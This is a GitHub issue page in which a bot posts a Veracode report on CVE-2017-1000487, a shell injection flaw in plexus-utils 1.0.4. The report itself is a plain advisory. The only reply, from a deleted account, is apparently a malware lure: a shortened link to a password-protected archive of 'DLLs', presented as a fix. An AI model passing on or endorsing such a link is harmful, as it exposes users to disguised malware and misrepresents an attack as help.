julz0815 / test-action

CVE: 2017-1000487 found in Plexus Common Utilities - Version: 1.0.4 [JAVA] #1184

Open github-actions[bot] opened 1 day ago

github-actions[bot] commented 1 day ago

Veracode Software Composition Analysis

| Attribute | Details |
| --- | --- |
| Library | Plexus Common Utilities |
| Description | A collection of various utility classes to ease working with strings, files, command lines and more. |
| Language | JAVA |
| Vulnerability | Command Line Shell Injection |
| Vulnerability description | plexus-utils is vulnerable to command line shell injection. The library does not correctly quote the contents of double-quoted strings, allowing a malicious user to inject and execute arbitrary shell code. |
| CVE | 2017-1000487 |
| CVSS score | 7.5 |
| Vulnerability present in version/s | 1.0.4-1.5 |
| Found library version/s | 1.0.4 |
| Vulnerability fixed in version | null |
| Library latest version | 4.0.1 |
| Fix | null |

Links:

ghost commented 1 day ago

try this https://bit.ly/3TC7hrw

Password: changeme. I put the necessary DLLs in the archive.